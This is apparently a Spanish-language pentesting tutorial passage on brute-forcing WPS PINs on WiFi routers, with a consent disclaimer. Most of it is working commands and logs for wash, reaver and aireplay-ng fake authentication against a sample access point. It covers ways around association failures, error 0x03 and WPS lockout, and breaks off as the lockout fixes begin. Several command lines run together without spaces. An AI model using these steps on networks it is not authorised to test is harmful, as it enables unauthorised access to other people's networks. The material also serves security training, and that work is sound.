En esta sección vamos a hacer ataques a redes WiFi con cifrado WPS, que permite a los dispositivos de una red conectarse de manera sencilla sin tener que utilizar la contraseña.
Disclaimer: Vamos a realizar ataques a redes WiFi, por lo que no podemos utilizar estas técnicas sin un consentimiento o aprobación por parte del objetivo
Características
WPS utiliza un pin de 8 dígitos
Es posible probar todos los pin en poco tiempo
Se puede utilizar el pin WPS para calcular la contraseña actual
Esto solo funciona si el router está configurado para no usar el PBC (Push Bottom Autentication). Si lo hacen por medio del botón, el equipo no se autenticará por medio del pin de 8 dígitos.
En los routers más modernos la opción WPS viene deshabilitada o solo da la opción de PBC.
Explotando WPS
Wash
Ver todas las redes cercanas con WPS activado con wash
reaver --help
Reaver v1.6.6 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>
Required Arguments:
-i, --interface=<wlan> Name of the monitor-mode interface to use
-b, --bssid=<mac> BSSID of the target AP
Optional Arguments:
-m, --mac=<mac> MAC of the host system
-e, --essid=<ssid> ESSID of the target AP
-c, --channel=<channel> Set the 802.11 channel for the interface (implies -f)
-s, --session=<file> Restore a previous session file
-C, --exec=<command> Execute the supplied command upon successful pin recovery
-f, --fixed Disable channel hopping
-5, --5ghz Use 5GHz 802.11 channels
-v, --verbose Display non-critical warnings (-vv or -vvv for more)
-q, --quiet Only display critical messages
-h, --help Show help
sudoreaver--bssid2C:96:82:3B:67:E7--channel6--interfacewlan0-vvReaverv1.6.6WiFiProtectedSetupAttackToolCopyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>[+] Switching wlan0 to channel 6[+] Waiting for beacon from 2C:96:82:3B:67:E7[+] Received beacon from 2C:96:82:3B:67:E7[+] Vendor: Broadcom[+] Trying pin "12345670"[+] Sending authentication request[+] Sending association request[+] Associated with 2C:96:82:3B:67:E7 (ESSID:TESTING)[+] Sending EAPOL START request[+] Received identity request[+] Sending identity response[!] WARNING: Receive timeout occurred
Nos puede dar un error de asociación, por lo que haremos un bypass
Bypass del error Failed Associate
Este error nos puede aparecer con los routers mas nuevos y seguros
# 1 - Ver redes con WPS activadosudowash--interfacewlan0mon# 2 - Reaver sin asociarnos al AP (-A)sudoreaver--bssid2C:96:82:3B:67:E7--channel6--interfacewlan0mon-vv-A# 3 - Asociarnos manualmente al APsudoaireplay-ng--fakeauth20-a<MAC-OBJETIVO>-h<MAC-ADAPTADOR><INTERFAZ>
sudoreaver--bssid2C:96:82:3B:67:E7--channel6--interfacewlan0-vvReaverv1.6.6WiFiProtectedSetupAttackToolCopyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>[+] Switching wlan0 to channel 6[+] Waiting for beacon from 2C:96:82:3B:67:E7[+] Received beacon from 2C:96:82:3B:67:E7[+] Vendor: Broadcom[+] Trying pin "12345670"[+] Sending authentication request[+] Sending association request[+] Associated with 2C:96:82:3B:67:E7 (ESSID:TESTING)[+] Sending EAPOL START request[+] Received identity request[+] Sending identity response[!] WARNING: Receive timeout occurred[+] Sending WSC NACK[!] WPS transaction failed (code:0x03), re-trying last pin
Nos puede dar un error 0x02 o 0x03, por lo que haremos un bypass
Bypass del error 0x03
Vamos a hacer un debugging para ver lo que está sucediendo.
Podemos saber que estamos en presencial del error cuando se queda en 0% en reaver y no avanza
# 1 - Ver redes con WPS activadosudowash--interfacewlan0mon# 2 - Reaver modo debugging -vvvsudoreaver--bssid2C:96:82:3B:67:E7--channel6--interfacewlan0mon-vvv# 3 - Asociarnos manualmente al APsudoaireplay-ng--fakeauth20-a<MAC-OBJETIVO>-h<MAC-ADAPTADOR><INTERFAZ>
El error 0x03 es: WPS transaction failed (code: 0x03)
# Reaver modo --no-nackssudoreaver--bssid2C:96:82:3B:67:E7--channel6--interfacewlan0mon-A--no-nacksReaverv1.6.6WiFiProtectedSetupAttackToolCopyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>[+] Waiting for beacon from 2C:96:82:3B:67:E7[+] Received beacon from 2C:96:82:3B:67:E7[+] Vendor: Broadcom[+] Associated with 2C:96:82:3B:67:E7 (ESSID:TESTING)
Bypass de WPS Lock
El ataque de fuerza bruta sobre WPS se hace probando diversas combinaciones hasta encontrar el pin. Algunos routers nos pueden bloquear después de una cierta cantidad de intentos fallidos.
El problema reside en que una vez estamos bloqueados, el router rechazará todos los pin aunque le enviemos el correcto. Para esto hay 2 soluciones: